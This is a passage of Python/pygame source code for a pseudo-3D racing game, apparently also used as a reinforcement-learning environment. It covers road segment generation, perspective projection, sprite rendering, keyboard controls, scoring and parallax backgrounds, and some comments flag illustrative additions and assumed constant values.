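        print('strip %2d: alpha %3d' % (i, ca))

#_demo_fog_alpha_ramp()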

class FPSptProgress(sptdraw.SptDrawBase):
    """Thin vertical progress bar (used for lap progress and speed)."""

    def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN):
        super(FPSptProgress, self).__init__(size)
        self.c_bg = c_bg
        self.c_prog = c_prog
        self.progress(0.0)

    def progress(self, p):
        self.fill(self.c_bg)
        y = int(self.size[1] * p)
        # from down to up
        self.pygm.draw.rect(self.surf, self.c_prog,
                            [0, self.size[1] - y, self.size[0] - 2, y])


class FPSptRoadMap(sptdraw.SptDrawBase):
    """Top-down minimap of the whole road, drawn as one polyline."""

    def __init__(self, size, segs, rad, *args, **kwargs):
        super(FPSptRoadMap, self).__init__(size)
        self.segs = segs
        self.rad = rad
        #self.fill(consts.WHITE)
        self.draw_segs(self.segs, self.rad)

    def xy_to_cntr(self, x, y):
        return [self.size[0] / 2 + x, self.size[1] / 2 - y]

    def cv_to_engl(self, curve, rad):
        # map an accumulated curve value to a heading change in radians
        a = float(curve) / rad
        a *= 10.0
        if a < -1.0:
            a = -1.0
        elif a > 1.0:
            a = 1.0
        #tht_d = math.acos(a)
        tht_d = math.asin(a)
        return tht_d

    def get_segs_pnts(self, segs, rad):
        pnts = []
        x, y = 0.0, 0.0
        tht = 0.0
        rad_m = 4.0#2.0#1.0#
        cv_s = 0
        cv_l = 0.0
        pnts.append([x, y])
        for seg in segs:
            curve = seg.get('curve', 0.0)
            if curve == 0.0:
                if cv_s:
                    tht_d = self.cv_to_engl(cv_l, rad)
                    #tht += tht_d
                    tht -= tht_d
                rad_m = 20.0#10.0#50.0#
                cv_s = 0
                cv_l = 0.0
            else:
                rad_m = 0.5#1.0#0.1#
                if cv_s:
                    cv_l += curve
                else:
                    cv_s = 1
                continue
            x += rad_m * math.cos(tht)
            y += rad_m * math.sin(tht)
            pnts.append([x, y])
        return pnts

    def draw_segs(self, segs, rad):
        pnts = self.get_segs_pnts(segs, rad)
        if len(pnts) <= 1:
            return
        cpnts = [self.xy_to_cntr(p[0], p[1]) for p in pnts]
        c = utils.clr_from_str(FP_COLOR_BLUE)
        #self.pygm.draw.polygon(self.surf, c, cpnts)
        self.pygm.draw.lines(self.surf, c, False, cpnts, 3)
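
# Illustrative sketch, not part of the original module: FPSptRoadMap turns the
# per-segment 'curve' values into a 2-D polyline by integrating a heading
# angle, as in get_segs_pnts() above. The toy heading update and the fake
# segment list below (straight, right bend, straight) are made up for the demo.
def _demo_roadmap_polyline():
    segs = [{'curve': 0.0}] * 10 + [{'curve': 4.0}] * 10 + [{'curve': 0.0}] * 10
    x, y, tht = 0.0, 0.0, 0.0
    pnts = [(x, y)]
    for seg in segs:
        tht -= seg['curve'] / 100.0  # toy update; the real map uses cv_to_engl()
        x += 4.0 * math.cos(tht)
        y += 4.0 * math.sin(tht)
        pnts.append((x, y))
    return pnts

#print(_demo_roadmap_polyline()[-1])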

class FPSptRoadB(sptdraw.SptDrawBase):
    """The pseudo-3D road: a list of segments projected row by row."""

    def __init__(self, size, cfg, *args, **kwargs):
        super(FPSptRoadB, self).__init__(size)
        self.cfg = cfg
        self.car = kwargs.get('car')
        self.bg_sky = kwargs.get('bg_sky')
        self.bg_hills = kwargs.get('bg_hills')
        self.bg_trees = kwargs.get('bg_trees')
        self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road'])
        self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass'])
        self.rd_reset(init=True)

    def prms_reset(self, keep_segs=False):
        self.e_keys_up = []
        self.e_keys_dn = []
        # camera position in world space
        self.camera_x = 0.0
        self.camera_y = 0.0
        self.camera_z = 500.0#1000.0#0.0
        # scratch values: world / camera / projected / screen coordinates
        self.xw = 0.0
        self.yw = 0.0
        self.zw = 0.0
        self.xc = 0.0
        self.yc = 0.0
        self.zc = 0.0
        self.xp = 0.0
        self.yp = 0.0
        self.xs = 0.0
        self.ys = 0.0
        self.d = 200.0#100.0#10.0#30.0#1.0  # eye-to-projection-plane distance
        self.w = self.size[0]
        self.h = self.size[1]
        if not keep_segs:
            self.segments = []
        self.rd_sprt_objs = {}
        self.rd_sprt_cache = []  # for sprites render order
        self.track_len = 0.0
        self.seg_len = 200.0#100.0#20.0#60.0#
        self.road_w = 2400#2000#600.0#200.0#1000.0#
        self.camera_h = 500.0#1000.0#
        self.speed_max = 300.0#180.0#200.0#100.0
        self.lane_w = 60
        self.seg_n = 300#200
        #self.seg_draw_n = 200#150
        self.seg_draw_n = 70#100#200#150
        self.speed = 0.0
        self.position = 0.0
        self.player_x = 0.0
        self.player_seg = None  # the segment just under the car
        self.player_di = 0  # 0:^ 1:> 2:v 3:<
        self.player_go = 0  # 0:- 1:^ 2:v
        self.speed_dt_up = 2.0  # (exact value not recovered)
        self.speed_dt_dn = 4.0  # (exact value not recovered)
        self.speed_dt_na = 1.0#3.0
        self.player_x_dt = 60.0#30.0#20.0
        self.centrifugal = 0.3  # as in the javascript-racer reference (assumed)
        self.flag_check_event = True  # (default assumed)
        self.last_seg_i = 0
        self.score = 0
        self.game_over = False
        self.game_score = 0.0
        self.tm_start = 0.0
        self.tm_end = 0.0
        self.tm_last_once = 0.0
        self.sky_speed = 0.1#0.05#
        self.hill_speed = 0.2#0.1#
        self.tree_speed = 0.3#0.15#

    def rd_reset(self, init=False, keep_segs=False, segs_file=None):
        if not init:
            self.rd_sprts_del_all_objs()
        self.prms_reset(keep_segs=keep_segs)
        if segs_file is not None:
            try:
                segs = self.rd_seg_json_load(segs_file)
                self.segments = segs
                self.track_len = len(self.segments) * self.seg_len
            except Exception as e:
                self.init_rd_segs_rand_1()
        else:
            if not keep_segs:
                self.init_rd_segs_rand_1()
        self.draw_on()
        self.rd_seg_render()

    def init_rd_segs_rand_1(self):
        #self.rd_seg_init(self.seg_n)
        #self.rd_seg_init(random.randint(30, 100))
        self.rd_seg_init(random.randint(1, 10))  # for a3c train
        self.rd_seg_init_rand_curve()
        #self.add_curves()
        #self.add_low_rolling_hills(20, 2.0)
        # for segment draw
        self.rd_seg_init(10)
        self.rd_start_seg_init()
        self.rd_sprts_init_rand()

    def draw_on(self, *args, **kwargs):
        self.fill(self.clr_dark_grass)

    def add_fog(self):
        self.fog = FPSptFog(self.size)
        self.fog.rect.top = 240
        self.fog.rect.left = 0
        self.disp_add(self.fog)

    def get_seg_base_i(self, pos=None):
        if pos is None:
            pos = self.position
        i = int(pos / self.seg_len)
        #i = int(utils.math_round(pos / self.seg_len))
        #i = int(math.floor(pos / self.seg_len))
        #i = int(math.ceil(pos / self.seg_len))
        return i

    def rd_get_segs(self, whole=False):
        if whole:
            segs = self.segments
        else:
            segs = self.segments[:-self.seg_draw_n]
        return segs

    def seg_lasy_y(self):
        # world y at the end of the current road (0.0 for an empty road)
        if not self.segments:
            return 0.0
        return self.segments[-1]['p2']['world'].get('y', 0.0)

    def rd_seg_init(self, a=500):
        for n in range(a):
            self.rd_seg_add(0.0, 0.0)

    def rd_seg_add(self, curve, yw):
        n = len(self.segments)
        #if n % 4 == 0:
        if n % 2 == 0:
            c = FP_COLORS['LIGHT']
        else:
            c = FP_COLORS['DARK']
        seg = {
            'index': n,
            'p1': {'world': {'z': (n + 1) * self.seg_len, 'y': self.seg_lasy_y()},
                   'camera': {}, 'screen': {}},
            'p2': {'world': {'z': (n + 2) * self.seg_len, 'y': yw},
                   'camera': {}, 'screen': {}},
            'curve': curve,
            'color': c,
            'sprites': [],
            'looped': 0,
        }
        self.segments.append(seg)
        self.track_len = len(self.segments) * self.seg_len
        #self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len

    def util_limit(self, value, mn, mx):
        return max(mn, min(value, mx))

    def util_accelerate(self, v, accel, dt):
        return v + (accel * dt)

    def util_increase(self, start, increment, mx):  # with looping
        result = start + increment
        while (result >= mx):
            result -= mx
        while (result < 0):
            result += mx
        return result

    def util_ease_in(self, a, b, percent):
        return a + (b - a) * math.pow(percent, 2)

    def util_ease_out(self, a, b, percent):
        return a + (b - a) * (1 - math.pow(1 - percent, 2))

    def util_ease_in_out(self, a, b, percent):
        return a + (b - a) * ((-math.cos(percent * math.pi) / 2) + 0.5)

    def util_curve_percent_remaining(self, n, total):
        return (n % total) / total

    def add_road(self, enter, hold, leave, curve, yw=0.0):
        start_y = self.seg_lasy_y()
        end_y = start_y + (int(yw) * self.seg_len)
        total = enter + hold + leave
        for n in range(enter):
            self.rd_seg_add(self.util_ease_in(0, curve, float(n) / enter),
                            self.util_ease_out(start_y, end_y, float(n) / total))
        for n in range(hold):
            self.rd_seg_add(curve,
                            self.util_ease_out(start_y, end_y, (float(n) + enter) / total))
        for n in range(leave):
            self.rd_seg_add(self.util_ease_out(curve, 0, float(n) / leave),
                            self.util_ease_out(start_y, end_y, (float(n) + enter + hold) / total))

    def add_curves(self):
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], 0.0)

    def add_low_rolling_hills(self, num=None, height=None):
        num = num or FP_ROAD['LENGTH']['SHORT']
        height = height or FP_ROAD['HILL']['LOW']
        self.add_road(num, num, num, 0, height / 2.0)
        self.add_road(num, num, num, 0, -height)
        self.add_road(num, num, num, 0, height)
        self.add_road(num, num, num, 0, 0)
        self.add_road(num, num, num, 0, height / 2.0)
        self.add_road(num, num, num, 0, 0)

    def rd_seg_init_rand(self, n=5):
        #print('rd_seg_init_rand', n)
        for i in range(n):
            p = random.random()
            rl = random.choice([1, -1])
            enter = random.randint(10, 40)
            hold = random.randint(10, 40)
            leave = random.randint(10, 40)
            if p < 0.3:
                curve = 0.0
                yw = 0.0
            else:
                curve = rl * random.random() * 8.0
                yw = 0.0
            self.add_road(enter, hold, leave, curve, yw)

    def rd_seg_init_rand_2(self, n=50):
        for i in range(n):
            p = random.random()
            rl = random.choice([1, -1])
            if p < 0.35:
                self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                              FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM'])
            elif p < 0.7:
                self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                              FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY'])
            else:
                enter = random.randint(10, 100)
                hold = random.randint(10, 100)
                leave = random.randint(10, 100)
                self.add_road(enter, hold, leave, 0.0, 0.0)

    def rd_seg_init_rand_curve(self, n=5):
        # the original body was not fully recovered; reuse the random curve
        # generator above
        self.rd_seg_init_rand(n)

    def rd_start_seg_init(self, n=3):
        seg_n = len(self.segments)
        if seg_n < n:
            n = seg_n
        for i in range(n):
            self.segments[i]['color'] = FP_COLORS['START_Y']

    def rd_sprts_init_rand(self, n=None):
        seg_n = len(self.segments)
        if n is None:
            #n = seg_n / 20
            n = seg_n // random.randint(10, 30)
        for i in range(n):
            j = random.randint(10, seg_n - 10)
            sprt = random.choice(list(FP_ROAD_SPRTS.keys()))
            s = {
                'name': sprt,
                'type': 1,  # image / animate / ...
                'obj': None,  # needs to be deleted at rd_sprts_del_all_objs()
                'x': None,  # get real (random) x from x_pos
                'x_i': random.randint(0, 4),
                'score': FP_ROAD_SPRTS[sprt].get('score', 0),
            }
            self.segments[j]['sprites'].append(s)

    def rd_seg_get_cleared(self, segs=None):
        # drop the live sprite objects so the segments can be JSON serialized
        if not segs:
            segs = self.segments
        segs_c = []
        for seg in segs:
            if not seg['sprites']:
                segs_c.append(seg)
            else:
                seg_c = {}
                for k, v in seg.items():
                    if k not in ['sprites']:
                        seg_c[k] = v
                    else:
                        seg_c[k] = []
                        for spr in seg['sprites']:
                            spr_n = {}
                            for sk, sv in spr.items():
                                if sk not in ['obj']:
                                    spr_n[sk] = sv
                                else:
                                    spr_n[sk] = None
                            seg_c[k].append(spr_n)
                segs_c.append(seg_c)
        return segs_c

    def rd_seg_json_save(self, f):
        sc = self.rd_seg_get_cleared(self.segments)
        s = utils.json_dumps(sc)
        with open(f, 'w') as fo:
            fo.write(s)

    def rd_seg_json_load(self, f):
        with open(f, 'r') as fi:
            s = fi.read()
        segs = utils.json_loads(s)
        return segs

    def geo_prjc_scale(self, d, zc):
        if zc == 0.0:
            return 1.0
        else:
            return d / zc

    def xc_to_xp(self, xc, d, zc):
        # camera space -> projection plane
        if zc == 0.0:
            #xp = float('inf')
            #xp = 2 ** 64
            xp = xc
        else:
            xp = xc * (d / zc)
        return xp

    def yc_to_yp(self, yc, d, zc):
        if zc == 0.0:
            yp = yc
        else:
            yp = yc * (d / zc)
        return yp

    def xp_to_xs(self, xp, w):
        # projection plane -> screen x (origin at screen center)
        #xs = w / 2.0 + w / 2.0 * xp
        xs = w / 2.0 + xp
        return xs

    def yp_to_ys(self, yp, h):
        # projection plane -> screen y (flipped: screen y grows downward)
        #ys = h / 2.0 - h / 2.0 * yp
        ys = h / 2.0 - yp
        return ys
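
    # Illustrative sketch, not part of the original source: one worked example
    # of the projection chain above (world -> camera -> projection plane ->
    # screen). The sample depth below is arbitrary; only the instance's
    # d / w / h settings are real.
    def _demo_projection_pipeline(self):
        zc = self.seg_len                      # toy depth: one segment ahead
        xc = self.road_w / 2 - self.player_x   # right road edge in camera space
        yc = self.camera_h                     # road plane sits camera_h below the eye
        xp = self.xc_to_xp(xc, self.d, zc)     # perspective divide: xc * d / zc
        yp = self.yc_to_yp(yc, self.d, zc)
        xs = self.xp_to_xs(xp, self.w)         # shift origin to the screen center
        ys = self.yp_to_ys(yp, self.h)         # flip y for screen coordinates
        print('xc=%s zc=%s -> xp=%s -> screen (%s, %s)' % (xc, zc, xp, xs, ys))
        return xs, ys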

    def rd_seg_render(self):
        """curve"""
        self.rd_sprt_cache = []  # clear the sprites cache
        seg_n = len(self.segments)
        segbi = self.get_seg_base_i()
        #print('segbi', segbi, ' / ', seg_n)
        self.player_seg = self.segments[segbi]
        self.base_seg = self.segments[(segbi + 2) % seg_n]
        # for test
        #self.base_seg['color'] = FP_COLORS['FINISH']
        b_curve = self.player_seg.get('curve', 0.0)
        #b_percent = 0.5
        b_percent = self.util_curve_percent_remaining(self.position, self.seg_len)
        dx_curve = - (b_curve * b_percent)
        x_curve = 0
        yc = self.camera_h
        for i in range(self.seg_draw_n):
            si = (segbi + i) % seg_n
            seg = self.segments[si]
            zw1 = (i + 1) * self.seg_len
            zw2 = (i + 2) * self.seg_len
            zc1 = zw1 - self.camera_z - (self.position % self.seg_len)
            zc2 = zw2 - self.camera_z - (self.position % self.seg_len)
            # road edges
            xc1 = self.road_w / 2 - self.player_x
            xc2 = -self.road_w / 2 - self.player_x
            xc3 = self.road_w / 2 - self.player_x
            xc4 = -self.road_w / 2 - self.player_x
            # rumble strips
            xcl1 = xc1 - self.lane_w
            xcl2 = xc2 + self.lane_w
            xcl3 = xc3 - self.lane_w
            xcl4 = xc4 + self.lane_w
            # center lane marks
            xcr1 = self.lane_w - self.player_x
            xcr2 = -self.lane_w - self.player_x
            xcr3 = self.lane_w - self.player_x
            xcr4 = -self.lane_w - self.player_x
            # for curve
            xc1 = xc1 - x_curve
            xc2 = xc2 - x_curve
            xc3 = xc3 - x_curve - dx_curve
            xc4 = xc4 - x_curve - dx_curve
            xcl1 = xcl1 - x_curve
            xcl2 = xcl2 - x_curve
            xcl3 = xcl3 - x_curve - dx_curve
            xcl4 = xcl4 - x_curve - dx_curve
            xcr1 = xcr1 - x_curve
            xcr2 = xcr2 - x_curve
            xcr3 = xcr3 - x_curve - dx_curve
            xcr4 = xcr4 - x_curve - dx_curve
            x_curve = x_curve + dx_curve
            dx_curve = dx_curve + seg.get('curve', 0.0)
            # for hills
            yw1 = seg['p1']['world'].get('y', 0.0)
            yw2 = seg['p2']['world'].get('y', 0.0)
            yc1 = yc - yw1
            yc2 = yc - yw2
            xp1 = self.xc_to_xp(xc1, self.d, zc1)
            xs1 = self.xp_to_xs(xp1, self.w)
            xp2 = self.xc_to_xp(xc2, self.d, zc1)
            xs2 = self.xp_to_xs(xp2, self.w)
            xp3 = self.xc_to_xp(xc3, self.d, zc2)
            xs3 = self.xp_to_xs(xp3, self.w)
            xp4 = self.xc_to_xp(xc4, self.d, zc2)
            xs4 = self.xp_to_xs(xp4, self.w)
            yp1 = self.yc_to_yp(yc1, self.d, zc1)
            ys1 = self.yp_to_ys(yp1, self.h)
            ys2 = ys1
            yp3 = self.yc_to_yp(yc2, self.d, zc2)
            ys3 = self.yp_to_ys(yp3, self.h)
            ys4 = ys3
            # grass
            self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,
                                seg['color']['grass'])
            # road
            self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,
                                seg['color']['road'])
            if 1:#i % 2 == 1:
                xpl1 = self.xc_to_xp(xcl1, self.d, zc1)
                xsl1 = self.xp_to_xs(xpl1, self.w)
                xpl2 = self.xc_to_xp(xcl2, self.d, zc1)
                xsl2 = self.xp_to_xs(xpl2, self.w)
                xpl3 = self.xc_to_xp(xcl3, self.d, zc2)
                xsl3 = self.xp_to_xs(xpl3, self.w)
                xpl4 = self.xc_to_xp(xcl4, self.d, zc2)
                xsl4 = self.xp_to_xs(xpl4, self.w)
                self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3, ys3, xs3, ys3,
                                    seg['color']['rumble'])
                self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4, ys4, xs4, ys4,
                                    seg['color']['rumble'])
                xpr1 = self.xc_to_xp(xcr1, self.d, zc1)
                xsr1 = self.xp_to_xs(xpr1, self.w)
                xpr2 = self.xc_to_xp(xcr2, self.d, zc1)
                xsr2 = self.xp_to_xs(xpr2, self.w)
                xpr3 = self.xc_to_xp(xcr3, self.d, zc2)
                xsr3 = self.xp_to_xs(xpr3, self.w)
                xpr4 = self.xc_to_xp(xcr4, self.d, zc2)
                xsr4 = self.xp_to_xs(xpr4, self.w)
                self.render_polygon(None, xsr1, ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3,
                                    seg['color']['rumble'])
            # for test
            #self.pygm.draw.circle(self.surf, consts.BLUE,
            #                      (int(xsr1), 116 - int(ys1)), 3, 0)
            # render road sprites
            # TODO: check if this seg is looped
            seg_scale = self.geo_prjc_scale(self.d, zc1)
            x_pos = [xsr1, xsr2, (xsr1 + xsl1) / 2.0, (xsr2 + xsl2) / 2.0, xsl1, xsl2]
            x_i = random.randint(0, len(x_pos) - 1)  # NOTE: not used now !!
            y_sprt = ys1
            scale_sprt = seg_scale * 8.0#10.0#2.0
            obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt)
            if obj:
                self.rd_sprt_cache.append(obj)
        # render the sprites with right order: far ones first, near on top
        for obj in self.rd_sprt_cache[::-1]:
            self.disp_add(obj)

    def render_polygon(self, ctx, x1, y1, x2, y2, x3, y3, x4, y4, color):
        #pnts = [[x1, y1], [x2, y2], [x3, y3], [x4, y4], [x1, y1]]
        # reflect the y-
        d = 116
        pnts = [[x1, d - y1], [x2, d - y2], [x3, d - y3], [x4, d - y4], [x1, d - y1]]
        c = utils.clr_from_str(color)
        try:
            self.pygm.draw.polygon(self.surf, c, pnts)
        except Exception as e:
            pass

    def rd_sprts_render(self, seg, x_pos, x_i, y, scale):
        sprts = seg['sprites']
        if not sprts:
            return None
        for i, info in enumerate(sprts):
            sprt = info['name']
            obj = info.get('obj')
            if not obj:
                obj_k = str(seg['index']) + '_' + str(i) + '_' + sprt
                img = FP_ROAD_SPRTS[sprt]['imgs'][0]
                obj = FPSptRdSprts.create_by_img(img)
                # avoid: pygame.error: Width or height is too large
                if scale > 500:
                    #print('scale <1>', scale)
                    pass
                else:
                    try:
                        obj.scale(scale)
                    except:
                        #print('scale <2>', scale)
                        pass
                x_i_saved = info.get('x_i')
                #if not x_i_saved:
                #    x_i_saved = x_i
                obj.rect.top = 116 - y + 240 - obj.rect.height
                obj.rect.left = x_pos[x_i_saved] - obj.rect.width // 2
                info['obj'] = obj
                self.rd_sprt_objs[obj_k] = obj  # for reset, to delete all
            # NOTE: only show one
            break
        return obj

    def rd_sprts_del_all_objs(self):
        for k, sprt in self.rd_sprt_objs.items():
            if sprt:
                self.disp_del(sprt)
        self.rd_sprt_objs = {}
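
    # Illustrative sketch, not part of the original source: rd_seg_render()
    # above bends the road with two accumulators per drawn row, dx_curve
    # (grows by each segment's 'curve') and x_curve (grows by dx_curve), so
    # the lateral shift is roughly quadratic in the row index. This is the
    # classic pseudo-3D curve trick from the articles cited in the module
    # docstring. Standalone rerun of just that accumulation:
    def _demo_curve_accumulation(self, curve=2.0, rows=8):
        x_curve, dx_curve = 0.0, 0.0
        shifts = []
        for i in range(rows):
            shifts.append(x_curve)
            x_curve = x_curve + dx_curve
            dx_curve = dx_curve + curve
        print('row shifts: %s' % shifts)  # [0.0, 0.0, 2.0, 6.0, 12.0, 20.0, ...]
        return shifts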

    def handle_event(self, events, *args, **kwargs):
        if not self.flag_check_event:
            return events
        else:
            return self.check_key(events)

    def check_key(self, events):
        r_events = []
        e_keys_up = []
        e_keys_dn = []
        for event in events:
            if event.type == self.pglc.KEYUP:
                di = self.key_to_di(event.key)
                if di is None:
                    di = self.key_to_di_b(event.key)
                if di is not None:
                    e_keys_up.append(di)
                else:
                    r_events.append(event)
            elif event.type == self.pglc.KEYDOWN:
                di = self.key_to_di(event.key)
                if di is None:
                    di = self.key_to_di_b(event.key)
                if di is not None:
                    e_keys_dn.append(di)
                else:
                    r_events.append(event)
            else:
                r_events.append(event)
        self.e_keys_up = e_keys_up
        self.e_keys_dn = e_keys_dn
        return r_events

    def key_to_di(self, k):
        if k == self.pglc.K_UP:
            return 0
        elif k == self.pglc.K_RIGHT:
            return 1
        elif k == self.pglc.K_DOWN:
            return 2
        elif k == self.pglc.K_LEFT:
            return 3
        else:
            return None

    def key_to_di_b(self, k):
        # alternate key set; only the K_f/K_j and K_SPACE/K_v/K_n rows were
        # recovered, the other two rows are assumptions
        if k == self.pglc.K_f or k == self.pglc.K_j:
            return 0
        elif k == self.pglc.K_d or k == self.pglc.K_k:
            return 1
        elif k == self.pglc.K_SPACE or k == self.pglc.K_v or k == self.pglc.K_n:
            return 2
        elif k == self.pglc.K_s or k == self.pglc.K_l:
            return 3
        else:
            return None

    def refresh(self, fps_clock, *args, **kwargs):
        self.check_player_di(self.e_keys_dn, self.e_keys_up)
        self.draw_on()
        self.rd_seg_render()
        self.update_world()
        self.check_if_car_out_road()
        self.check_score()
        self.check_tm()
        self.update_bg()

    def check_player_di(self, e_keys_dn, e_keys_up):
        if 0 in e_keys_dn:
            self.player_go = 1
        elif 2 in e_keys_dn:
            self.player_go = 2
        if 1 in e_keys_dn:
            self.player_di = 1
        elif 3 in e_keys_dn:
            self.player_di = 3
        if 0 in e_keys_up:
            if self.player_go != 2:
                self.player_go = 0
        if 2 in e_keys_up:
            if self.player_go != 1:
                self.player_go = 0
        if 1 in e_keys_up:
            if self.player_di != 3:
                self.player_di = 0
        if 3 in e_keys_up:
            if self.player_di != 1:
                self.player_di = 0

    def update_world(self):
        if self.player_go == 1:
            self.speed += self.speed_dt_up
        elif self.player_go == 2:
            self.speed -= self.speed_dt_dn
        else:
            self.speed -= self.speed_dt_na
        # if on the grass, slow down (TODO in the original)
        if self.speed < 0.0:
            self.speed = 0.0
        elif self.speed > self.speed_max:
            self.speed = self.speed_max
        self.position += self.speed
        if self.position > self.track_len:
            self.position -= self.track_len
            # for check score
            self.last_seg_i = 0
            # a full lap counts as a win for the a3c training setup
            self.game_over = True
            self.game_score = 1.0
        if self.player_di == 1:
            #self.player_x += self.player_x_dt
            self.player_x += self.speed / 5 + 20
        elif self.player_di == 3:
            #self.player_x -= self.player_x_dt
            self.player_x -= self.speed / 5 + 20
        else:
            pass
        # curves push the car outward
        p_curve = self.player_seg.get('curve', 0.0)
        p_dt = self.speed * p_curve * self.centrifugal
        #p_dt = 40
        #p_dt = -40
        #self.player_x -= p_dt
        self.player_x += p_dt

    def check_if_car_out_road(self):
        # decrease score when go out the road
        if self.player_x < -self.road_w / 2 or \
                self.player_x > self.road_w / 2:
            if self.score > 0:
                self.score -= 1
            #if self.score < 0:
            #    self.score = 0
            self.game_over = True
            self.game_score = -1.0

    def check_score(self):
        # make sure we check score once for a segment
        seg_i = self.player_seg['index']
        if seg_i != self.last_seg_i:
            self.last_seg_i = seg_i
        else:
            return
        # NOTE: here we should use the segment just under the car
        #sprts = self.player_seg['sprites']
        sprts = self.base_seg['sprites']
        if not sprts:
            return
        # NOTE: we now only use the first sprite !
        sprt = sprts[0]
        x_i = sprt.get('x_i')
        if x_i is None:
            return
        scr = sprt.get('score')
        if not scr:  # None or 0
            return
        obj = sprt.get('obj')
        if not obj:
            return
        car_x = self.player_x
        car_w = self.car.rect.width * 2
        sprt_w = obj.rect.width * 2  # (scaling factor assumed, as for car_w)
        # lateral offset for each x_pos slot
        sprt_at = 10000
        if x_i == 0:
            sprt_at = 40
        elif x_i == 1:
            sprt_at = -40
        elif x_i == 2:
            sprt_at = 580
        elif x_i == 3:
            sprt_at = -580
        elif x_i == 4:
            sprt_at = 1100
        elif x_i == 5:
            sprt_at = -1100
        w_half = car_w / 2 + sprt_w / 2
        #if (car_x + car_w / 2) < sprt_x < (car_x + car_w / 2):
        if (car_x - w_half) < sprt_at < (car_x + w_half):
            self.score += scr

    def check_tm(self):
        if self.position > self.seg_len * 2:
            if self.tm_start == 0.0:
                self.tm_start = time.time()
                self.tm_end = self.tm_start
            else:
                self.tm_end = time.time()
            self.tm_last_once = self.tm_end - self.tm_start
        else:
            self.tm_start = 0.0
            #self.tm_end = 0.0

    def update_bg(self):
        # always move the cloud
        for sky in self.bg_sky:
            sky.rect.left -= 1#self.sky_speed
            if sky.rect.left + sky.rect.width < 0:
                sky.rect.left += sky.rect.width * 2
        if self.speed <= 0.0:
            return
        p_curve = self.player_seg.get('curve', 0.0)
        p_dt = self.speed * p_curve * self.centrifugal
        #p_dt = random.randint(-100, 100)
        for sky in self.bg_sky:
            sky.rect.left += int(self.sky_speed * p_dt)
            if sky.rect.left + sky.rect.width < 0:
                sky.rect.left += sky.rect.width * 2
            if sky.rect.left - sky.rect.width > 0:
                sky.rect.left -= sky.rect.width * 2
        for hill in self.bg_hills:
            hill.rect.left += int(self.hill_speed * p_dt)
            if hill.rect.left + hill.rect.width < 0:
                hill.rect.left += hill.rect.width * 2
            if hill.rect.left - hill.rect.width > 0:
                hill.rect.left -= hill.rect.width * 2
        for trees in self.bg_trees:
            trees.rect.left += int(self.tree_speed * p_dt)
            if trees.rect.left + trees.rect.width < 0:
                trees.rect.left += trees.rect.width * 2
            if trees.rect.left - trees.rect.width > 0:
                trees.rect.left -= trees.rect.width * 2
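
# Illustrative sketch, not part of the original module: the pickup check in
# FPSptRoadB.check_score() is a 1-D interval-overlap test on the player's
# lateral axis. The default numbers below are made up for the demo.
def _demo_pickup_overlap(car_x=0.0, car_w=160.0, sprt_at=40.0, sprt_w=80.0):
    w_half = car_w / 2 + sprt_w / 2
    hit = (car_x - w_half) < sprt_at < (car_x + w_half)
    print('sprite at %s, window +/- %s -> hit: %s' % (sprt_at, w_half, hit))
    return hit

#_demo_pickup_overlap()             # hit: True
#_demo_pickup_overlap(sprt_at=580)  # hit: False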

class FPStraight(pygm.PyGMSprite):
    """The playable screen: scrolling backgrounds, road, car and HUD."""

    def __init__(self, cfg, *args, **kwargs):
        super(FPStraight, self).__init__()
        self.cfg = cfg
        self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY'])
        self.bg_sky1.rect.top = 0
        self.bg_sky1.rect.left = 0
        self.disp_add(self.bg_sky1)
        self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY'])
        self.bg_sky2.rect.top = 0
        self.bg_sky2.rect.left = self.bg_sky1.rect.width
        self.disp_add(self.bg_sky2)
        self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS'])
        self.bg_hills1.rect.top = 0
        self.bg_hills1.rect.left = 0
        self.disp_add(self.bg_hills1)
        self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS'])
        self.bg_hills2.rect.top = 0
        self.bg_hills2.rect.left = self.bg_hills1.rect.width
        self.disp_add(self.bg_hills2)
        self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES'])
        self.bg_trees1.rect.top = 0
        self.bg_trees1.rect.left = 0
        self.disp_add(self.bg_trees1)
        self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES'])
